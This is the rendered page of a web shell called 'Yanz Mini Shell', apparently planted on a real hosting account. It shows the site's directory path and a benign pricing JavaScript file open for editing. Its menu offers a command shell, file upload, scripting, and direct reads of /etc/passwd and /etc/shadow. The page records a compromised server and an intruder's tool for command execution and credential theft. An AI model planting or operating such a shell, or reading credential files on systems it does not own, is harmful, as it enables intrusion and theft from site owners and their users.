Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * Pricing */ 'use strict'; document.addEventListener('DOMContentLoaded', function (event) { (function () { const priceDurationToggler = document.querySelector('.price-duration-toggler'), priceMonthlyList = [].slice.call(document.querySelectorAll('.price-monthly')), priceYearlyList = [].slice.call(document.querySelectorAll('.price-yearly')); function togglePrice() { if (priceDurationToggler.checked) { // If checked priceYearlyList.map(function (yearEl) { yearEl.classList.remove('d-none'); }); priceMonthlyList.map(function (monthEl) { monthEl.classList.add('d-none'); }); } else { // If not checked priceYearlyList.map(function (yearEl) { yearEl.classList.add('d-none'); }); priceMonthlyList.map(function (monthEl) { monthEl.classList.remove('d-none'); }); } } // togglePrice Event Listener togglePrice(); priceDurationToggler.onchange = function () { togglePrice(); }; })(); });
Free Space : 11116171264 Byte